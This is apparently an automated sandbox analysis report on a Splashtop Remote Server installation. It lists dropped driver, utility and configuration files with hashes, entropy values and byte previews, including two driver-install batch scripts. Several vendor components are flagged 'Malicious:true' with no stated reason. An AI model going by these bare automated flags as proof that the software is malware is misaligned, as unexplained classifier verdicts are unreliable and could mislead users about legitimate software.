                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7262628705263445
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:3HDc4F4V4U4k4v4g4L4wfyPUc5Bn+vjdQjNuDVjFfJCk72sI/72sIPTZGjo2D:KyPUc5Bn+bdsN4jFfJR25T25wZ
                                                                                                                                                                                                                                                                                                                                  MD5:E1F2A2FD0D41438A375F0DDC1822AA7C
                                                                                                                                                                                                                                                                                                                                  SHA1:267F8BFFABCCA4D46556519C105C0C6055B6F6D0
                                                                                                                                                                                                                                                                                                                                  SHA-256:606E0918952F5441D31F5335F09FD6AACAE0A5850A0174280FF34F6772A0B768
                                                                                                                                                                                                                                                                                                                                  SHA-512:1CF4B1E989819ECB134DCBD9C842F69D97A4949ED319D712BF14729C8A0BE0FF22122E3FADC4F4B2A86916F5EBF717E5CCE6E7620DD90EA73551CB523703EC0C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdsmpl.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver main GPD file...*%....*GPDFileVersion: "1.2"..*GPDSpecVersion: "1.2"..*GPDFileName: "XDSmpl.gpd"..*Include: "msxpsinc.gpd"..*Include: "StdNames.gpd"..*Include: "xdnames.gpd"..*Include: "xdwmark.gpd"..*Include: "xdbook.gpd"..*Include: "xdcolman.gpd"..*Include: "xdnup.gpd"..*Include: "xdpgscl.gpd"..*ModelName: "XPSDrv Sample Driver"..*MasterUnits: PAIR(1200, 1200)..*ResourceDLL: "unires.dll"..*PrinterType: PAGE..*MaxCopies: 1....*%*********************************************************************

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\xdsmpl.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):475
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.248799523355892
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:fp+BF8aNytrHLCSKsSHUJhGbkxIESnPEcF4RqWo40nUv:fp+D8MkHLNKsSyh2kBoP3FsqA02
                                                                                                                                                                                                                                                                                                                                  MD5:2EFCEBC23D661F3BFA0A4A4BE0588466
                                                                                                                                                                                                                                                                                                                                  SHA1:1ED92AEC943CFE143A7DBBCE2A82141D67FB9169
                                                                                                                                                                                                                                                                                                                                  SHA-256:DC50AFD088B0D72935D0CDF8F99071A7C80A4979BC9AF915016DD847F222EBE9
                                                                                                                                                                                                                                                                                                                                  SHA-512:FC1FF31E2CBFA1BC8A825548C6C4661236FAF12D8B75F25010E783DE116FC48B61F0188A4673C2C60A52181F6E7F0EFE39BF9B0A7D35B1937EC02B97FCCB7955
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:;..; Copyright (c) 2005 Microsoft Corporation..;..; All rights reserved...;..; THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..; ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..; THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..; PARTICULAR PURPOSE...;..; File Name:..;..; xdsmpl.ini..;..; Abstract:..;..; XPSDrv sample driver configuration file for UI plug-in...;....[OEMFiles]..OEMConfigFile1=xdsmplui.DLL......

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\xdwmark.gpd

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1554
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.555759044915239
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:FCDZkHSs9/9Tmm8LYReOR1RwrRpRajx8LZRzQRVRC:sDuHnmmoYRVR1RwrRpRajxoZRcRVRC
                                                                                                                                                                                                                                                                                                                                  MD5:C922269B15071195905ACE600AC9B02C
                                                                                                                                                                                                                                                                                                                                  SHA1:BCC559EBBFCAC61A67905B5DBB9D3E8E27D413E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:2FC61A7629E0382699E8178AC8131666BB1BADA65F9B7AC738E7620C1D3A4E40
                                                                                                                                                                                                                                                                                                                                  SHA-512:C4ACE0F94150ED02580A365798981FD30484B3E13576624620377F077AD4A6C0AA06ED3DBC1B8A64406F357321A9AD027A1A12D9C98A407D27B58CA857D74E84
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdwmark.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver watermark specific GPD settings...*%....*%******************************************************************************..*% PageWatermark..*%******************************************************************************..*Feature: PageWatermarkType..{.. *rcNameID: =IDS_GPD_WATERMARKTYPE.. *DefaultOption: None.... *Option: None.. {.. *rcNameID: =IDS_GPD_NONE.. }.... *Option: Text.. {.. *rcNameID: =IDS_GPD_TEXT.. }.... *Option: Raster.. {.. *rcNameID: =IDS_GPD_RASTERIMAGE.. }.... *Option: Ve

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\xdwscRGB.icc

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Microsoft color profile 2.2, type lino, RGB/Lab-spac device by MSFT, 124856 bytes, 10-5-2006 12:14:35 "Created by Microsoft WCS from DMP: scRGB virtual device model profile, CAMP: Default sRGB monitor, and GMMP: Default Gamut M"
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):124856
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.796177094859484
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:wq47C9ZJMKkyYHlMRyu2FK0MjUq2mX14F4Q7asMM06KI:w29bMPyASyumQwmleHf91
                                                                                                                                                                                                                                                                                                                                  MD5:45CC4B43673056B8625ADD43EFDF33DD
                                                                                                                                                                                                                                                                                                                                  SHA1:2A7E28C7696CAF775344A31A23DCDADF15A5F1BD
                                                                                                                                                                                                                                                                                                                                  SHA-256:089BE57682C9F866DCCE74E1D174AA9816BC0992C1CE6EC01E03958964EF852A
                                                                                                                                                                                                                                                                                                                                  SHA-512:08A1FEA06EED5B874BE487F0F523ADCB98262FFA7158F54A724963827ACBF6318EEE99948AEB999C6F6EF875EA04E2B2377CBE623BB4679FB90BE785C75560DC
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:...lino. ..spacRGB Lab ...........#acspMSFT...................................-MSFT................................................desc......."cprt.......1wtpt...$....A2B0...8...ZB2A0.......ZMS00..U.....desc........Created by Microsoft WCS from DMP: scRGB virtual device model profile, CAMP: Default sRGB monitor, and GMMP: Default Gamut Map Model Profile for photos.enUS....C.r.e.a.t.e.d. .b.y. .M.i.c.r.o.s.o.f.t. .W.C.S. .f.r.o.m. .D.M.P.:. .s.c.R.G.B. .v.i.r.t.u.a.l. .d.e.v.i.c.e. .m.o.d.e.l. .p.r.o.f.i.l.e.,. .C.A.M.P.:. .D.e.f.a.u.l.t. .s.R.G.B. .m.o.n.i.t.o.r.,. .a.n.d. .G.M.M.P.:. .D.e.f.a.u.l.t. .G.a.m.u.t. .M.a.p. .M.o.d.e.l. .P.r.o.f.i.l.e. .f.o.r. .p.h.o.t.o.s...........................................................................text....Copyright (c) 2004 Microsoft Corporation....XYZ .......T........mft2................................................BeBwB.B.B.B.B.B.B.C.C.C"C3CECVCgCxC.C.C.C.C.C.C.D.D.D$D5DFDWDhDzD.D.D.D.D.D.D.E.E.E%E6EHEYEjE{E.E.E.E.E.E.E.F.F.F'F8FIFZFlF}

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\utils\DIFxCmd.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7653420469834185
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:F+0YcUgZN/zSbTyB9Bs+VC+k5JEdVMNuE:F+oUgZN/zSbTysOC+k5MVs
                                                                                                                                                                                                                                                                                                                                  MD5:1EF7574BC4D8B6034935D99AD884F15B
                                                                                                                                                                                                                                                                                                                                  SHA1:110709AB33F893737F4B0567F9495AC60C37667C
                                                                                                                                                                                                                                                                                                                                  SHA-256:0814AAD232C96A4661081E570CF1D9C5F09A8572CFD8E9B5D3EAD0FA0F5CA271
                                                                                                                                                                                                                                                                                                                                  SHA-512:947C306A3A1EEC7FCE29EAA9B8D4B5E00FD0918FE9D7A25E262D621FB3EE829D5F4829949E766A660E990D1AC14F87E13E5DBD5F7C8252AE9B2DC82E2762FB73
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Jp.....V...V...V.ivV...V.igV...V.iaV...V...V&..V.iqV...V.icV...VRich...V........PE..L....zZP.............................#.......0...............................P............@...... ..........................d(..P............................@..l.......................................@............................................text............................... ..`.data...x....0......."..............@....reloc.......@.......$..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\utils\DIFxCmd64.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.547294400796419
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:yg/LSSz/NZS+cI818WJ6TPPeqj6wnzX/bHz3coD:yg/LSSz/NZSBITOg6+D/X
                                                                                                                                                                                                                                                                                                                                  MD5:F512536173E386121B3EBD22AAC41A4E
                                                                                                                                                                                                                                                                                                                                  SHA1:74AE133215345BEAEBB7A95F969F34A40DDA922A
                                                                                                                                                                                                                                                                                                                                  SHA-256:A993872AD05F33CB49543C00DFCA036B32957D2BD09AAA9DAFE33B934B7A3E4A
                                                                                                                                                                                                                                                                                                                                  SHA-512:1EFA432EF2D61A6F7E7FC3606C5C982F1B95EABC4912EA622D533D540DDCA1A340F8A5F4652AF62A9EFC112CA82D4334E74DECF6DDBC88B0BD191060C08A63B9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................................................................Rich....................PE..d....vZP.........."...... ..........(%.......................................`.......`....@.......... ......................................4+..P............@...............P......p...................................................8............................text............ .................. ..`.data........0.......$..............@....pdata.......@.......&..............@..@.reloc..8....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\utils\devcon.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):77824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.995224286140262
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3zrhT5+KybRpnE8K74kca7NerB8iXpYmRRXvdi82BSOe9oKSJ2SLD0BEZWkA:3+KY04RMmSCYmBiF4O7WT
                                                                                                                                                                                                                                                                                                                                  MD5:B40FE65431B18A52E6452279B88954AF
                                                                                                                                                                                                                                                                                                                                  SHA1:C25DE80F00014E129FF290BF84DDF25A23FDFC30
                                                                                                                                                                                                                                                                                                                                  SHA-256:800E396BE60133B5AB7881872A73936E24CBEBD7A7953CEE1479F077FFCF745E
                                                                                                                                                                                                                                                                                                                                  SHA-512:E58CF187FD71E6F1F5CF7EAC347A2682E77BC9A88A64E79A59E1A480CAC20B46AD8D0F947DD2CB2840A2E0BB6D3C754F8F26FCF2D55B550EEA4F5D7E57A4D91D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L..."..."..."....."......"......"...#.S."....."..`\..."......"......".Rich..".................PE..L...#.pK.................l..........Td.......................................P............@...... ..........................lm..........p....................@...... ...............................0...@............................................text... j.......l.................. ..`.data...4............p..............@....rsrc...p............v..............@..@.reloc.......@.......&..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\utils\devcon64.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.977706172799676
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:MP2K0pa0WfEYp9Y/XQhpgnbP212YCJpDhiF4O7W:MePOYe4bu1epDh8RW
                                                                                                                                                                                                                                                                                                                                  MD5:3904D0698962E09DA946046020CBCB17
                                                                                                                                                                                                                                                                                                                                  SHA1:EDAE098E7E8452CA6C125CF6362DDA3F4D78F0AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:A51E25ACC489948B31B1384E1DC29518D19B421D6BC0CED90587128899275289
                                                                                                                                                                                                                                                                                                                                  SHA-512:C24AB680981D8D6DB042B52B7B5C5E92078DF83650CAD798874FC09CE8C8A25462E1B69340083F4BCAD20D67068668ABCFA8097E549CFA5AD4F1EE6A235D6EEA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X...9...9...9...AF..9...AW..9...A@..9...9..f9...AP.9...AY..9.......9...AG..9...AB..9..Rich.9..........................PE..d.....pK.........."......~...........s.......................................p......|.....@.......... ......................................X}..........p.......T............`......0................................................................................text....|.......~.................. ..`.data...x...........................@....pdata..T...........................@..@.rsrc...p...........................@..@.reloc..p....`.......>..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win10\32bits\stvad.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):55112
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.95804253448452
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:+EmCoFSZSI9Xhq7xYQAucXy069A3hKhy06ia3hyKb3LCxLVNe9zLuX:+EmPFSYWXf69A3hK16x3hyKbOnNazSX
                                                                                                                                                                                                                                                                                                                                  MD5:9D62CBDE4079B1BE2CB1B91BDD74E539
                                                                                                                                                                                                                                                                                                                                  SHA1:C54E743DE54B9D1D35CDA8F15562483163A064C0
                                                                                                                                                                                                                                                                                                                                  SHA-256:63347E07C934A788F5996EF91D86F718C273DB6221BF448F0659F70194A65031
                                                                                                                                                                                                                                                                                                                                  SHA-512:E3DE199BAABCB087A07071D67F2A0EE3E0F01E06B23B75B6FDCF1146CE782263E1A63D32B4DAFF3699766FD3922AB41F9DCB4497398DB5F0DA9EA33F5FDDF24C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5..5..5..!..4..!..2..5.....!..3.....>.... .4.....4..Rich5..........................PE..L...;..b.................D...&......0p....... ....@..................................i....@E................................`p..P.......p............n..Hi...........(..8...........................8)............... ...............................text...w........................... ..h.rdata....... ......................@..H.data........0....... ..............@...PAGE.....,...@.......0.............. ..`INIT.........p.......^.............. ..b.rsrc...p............d..............@..B.reloc...............h..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win10\64bits\stvad.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):62816
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.690155437787919
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:7FkBLAYEMVmkPGsfD6ppH3hLW6G3heObqQyvzP:75YskPGiDaphWqOuQyvr
                                                                                                                                                                                                                                                                                                                                  MD5:9CE89A1A93E196AA261561B1E5C3AFC6
                                                                                                                                                                                                                                                                                                                                  SHA1:8ECDB82C1C4A9C4431826097EDB11718152AD7A5
                                                                                                                                                                                                                                                                                                                                  SHA-256:CBB084056495566BFC8D933D7094694053ADDB91C190F95F791016CF6368D94D
                                                                                                                                                                                                                                                                                                                                  SHA-512:A4E7E93819CDCFDF0ED468F0138AD2774D2D7D8A587A01A4745F61AC27DFCD41A49922827E7029FC7564DF3866C64464B7B131CEBF3D39AD85D94E533AE53C5B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........x...+...+...+..*.+..*...+...+..+..*.+..*.+L..*...+L.a+.+L..*.+Rich...+................PE..d...8..b.........."......R...8......0..........@.....................................%....`A....................................................<.......p....p..........`i......T....<..8...........................P<...............0..0............................text...)........................... ..h.rdata.......0......................@..H.data........P.......,..............@....pdata.......p.......@..............@..HPAGE....$7.......8...F.............. ..`INIT.................~.............. ..b.rsrc...p...........................@..B.reloc..T...........................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win10\install_driver.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):285
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.794885910225241
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:fAjsd9KwqJ6dAGgOdHNMDPVgOdyE23PVgmfd9RNIgm9MOdELVb4NMD7:EWZ9dAudm95dyE239nd9RGpDdwh7
                                                                                                                                                                                                                                                                                                                                  MD5:1690361AD6F64AA935F0C71847F763B6
                                                                                                                                                                                                                                                                                                                                  SHA1:5F8682A46B5A4DF1F03D8078240F6619B0C90DDF
                                                                                                                                                                                                                                                                                                                                  SHA-256:D7CBA410A986FD863C69BDB98311A2F49E04F3ED7C1499C6A5557B7BA856B5AE
                                                                                                                                                                                                                                                                                                                                  SHA-512:2CE17EEF081E5C7F68E7584413C65242A1CE240B23F1226906DB6F6BC12E97B834545DA6B43BE5903D6EDBC66B1899634D9115E6688961F5547297819989D2EE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:rem echo off..cd %~dp0....REM uninstall...\..\..\..\SRUtility.exe -u...\..\utils\devcon.exe remove *STVAD >> inst.log...\..\utils\devcon.exe rescan >> inst.log...\..\utils\DIFxCmd.exe /u stvad.inf >> inst.log....REM install...\..\utils\devcon.exe install stvad.inf *STVAD >> inst.log..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win10\install_driver64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):289
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.864786270026779
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajsd9KwqJ6dAGgOdRLvNMDPVgOdRLKE23PVgmBd9RNIgm9MOdRL6Vb4NMD7:kWZ9dAudE95d0E239Jd9RGpDdCh7
                                                                                                                                                                                                                                                                                                                                  MD5:678C5FB9E1F87E4986E2B80B55740A9C
                                                                                                                                                                                                                                                                                                                                  SHA1:3E30F2B668EEAE7F8D0A192F6F3B9EE6213D58E8
                                                                                                                                                                                                                                                                                                                                  SHA-256:E04797F8F85EAAB68DA60C9E2F08E224DBF379ECC6085BD2A8C79974FF1D46E3
                                                                                                                                                                                                                                                                                                                                  SHA-512:B6FD46FE165ACB6169056465248078B9794669846B57E616F8DB923C6EDD324A625BE968E499463BADC7B99660A8CE3304333BA9D92D8907C98C6B3CB6B7DB6E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....REM uninstall...\..\..\..\SRUtility.exe -u...\..\utils\devcon64.exe remove *STVAD >> inst.log...\..\utils\devcon64.exe rescan >> inst.log...\..\utils\DIFxCmd64.exe /u stvad.inf >> inst.log....REM install...\..\utils\devcon64.exe install stvad.inf *STVAD >> inst.log..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win10\stvad.cat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11950
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.350152493437532
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:mgQzOQtQyQHOQqQWNJCHF1agjEwOXP6hYCe68JGlD/Jn9VOMbSX01k9z3AoXSkqr:INg/k6h3e1GlD/LVNSR9zrVqr
                                                                                                                                                                                                                                                                                                                                  MD5:6E88194D307CE842B43826CA7B473411
                                                                                                                                                                                                                                                                                                                                  SHA1:1C8767D498A53C6287EA89BCEB43A21C4F4AF479
                                                                                                                                                                                                                                                                                                                                  SHA-256:E75BF820E72813D3C46D11502267B3FE445E9A7F05E855DF97811D3E2333EE3A
                                                                                                                                                                                                                                                                                                                                  SHA-512:016B756C585648B0AF746E906302FC021516B0419DBD9B5444B11C709D3C6AE8CF330A1A49D7ACD341846D558FDC18C1DE5B97DA59ED53C887A854B8BDA5679F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7.....y...K.O.."+ H.I..220214055503Z0...+.....7.....0...0......(u..m.,..E5.IhF..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...06..+.....7...1(0&...F.i.l.e........s.t.v.a.d...i.n.f...0....6=0..z..-.c..q..xS.1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...06..+.....7...1(0&...F.i.l.e........s.t.v.a.d...s.y.s...0.... Vf.*...S.....3...7.D.%.Azv).`>1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...06..+.....7...1(0&...F.i.l.e........s.t.v.a.d...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... Vf.*...S.....3...7.D.%.Azv).`>0... .j.[6=uPASr......) .N.g].!i.1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...06..+.....7...1(0&...F.i.l.e........s.t.v.a.d...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .j.[6=uPASr......) .N.g].!i.0.....U....Z....$......1..0...+...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win10\stvad.inf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4338
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5192534972153515
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:2kSMHhlJjFdN5JHzI8LeTMdH33I8vV4xmzAchZ8MMCuj:2kSMHdxdnJHTeT+3B4xm09j
                                                                                                                                                                                                                                                                                                                                  MD5:8E91B0F01FFE8DF22050392F91D8F28D
                                                                                                                                                                                                                                                                                                                                  SHA1:1ECD2875D29F0F6DE62C1DBA4535D7496846B70D
                                                                                                                                                                                                                                                                                                                                  SHA-256:946AE6ACA55B363D7550415372A8A483BEDA152920104EE4675DD4AC2169ECA1
                                                                                                                                                                                                                                                                                                                                  SHA-512:5B421B323084E851154C15E22769BDBA12C555DD8DF949B21719CF13C0549EEE1AC48C4EC4802EC08A725A4515C449BACE6E43F0DC67B54BAB1DB08D2408AA59
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
